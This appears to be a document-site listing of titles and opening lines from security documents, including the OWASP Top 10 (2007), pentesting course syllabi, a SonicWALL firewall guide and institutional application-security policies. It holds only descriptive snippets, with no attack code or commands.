Computer and Communication Systems Lehrstuhl für Technische Informatik Network Security Exercise #8 Falko Dressler and Christoph Sommer Computer and Communication Systems Institute of Computer Science,
05.0 Application Development
Number 5.0 Policy Owner Information Security and Technology Policy Application Development Effective 01/01/2014 Last Revision 12/30/2013 Department of Innovation and Technology 5. Application Development
MANAGED SECURITY TESTING
MANAGED SECURITY TESTING SERVICE LEVEL COMPARISON External Network Testing (EVS) Scanning Basic Threats Penetration Testing Network Vulnerability Scan Unauthenticated Web App Scanning Validation Of Scan
Web Application Firewall on SonicWALL SSL VPN
Web Application Firewall on SonicWALL SSL VPN Document Scope This document describes how to configure and use the Web Application Firewall feature in SonicWALL SSL VPN 5.0. This document contains the following
Common Security Vulnerabilities in Online Payment Systems
Common Security Vulnerabilities in Online Payment Systems Author- Hitesh Malviya(Information Security analyst) Qualifications: C!EH, EC!SA, MCITP, CCNA, MCP Current Position: CEO at HCF Infosec Limited
Learn Ethical Hacking, Become a Pentester
Learn Ethical Hacking, Become a Pentester Course Syllabus & Certification Program DOCUMENT CLASSIFICATION: PUBLIC Copyrighted Material No part of this publication, in whole or in part, may be reproduced,
OWASP and OWASP Top 10 (2007 Update) OWASP. The OWASP Foundation. Dave Wichers. The OWASP Foundation. OWASP Conferences Chair dave.wichers@owasp.
and Top 10 (2007 Update) Dave Wichers The Foundation Conferences Chair [email protected] COO, Aspect Security [email protected] Copyright 2007 - The Foundation This work is available
FINAL DoIT 04.01.2013- v.8 APPLICATION SECURITY PROCEDURE
Purpose: This procedure identifies what is required to ensure the development of a secure application. Procedure: The five basic areas covered by this document include: Standards for Privacy and Security
https://elearn.zdresearch.com https://training.zdresearch.com/course/pentesting
https://elearn.zdresearch.com https://training.zdresearch.com/course/pentesting Chapter 1 1. Introducing Penetration Testing 1.1 What is penetration testing 1.2 Different types of test 1.2.1 External Tests
Last update: February 23, 2004
Last update: February 23, 2004 Web Security Glossary The Web Security Glossary is an alphabetical index of terms and terminology relating to web application security. The purpose of the Glossary is to
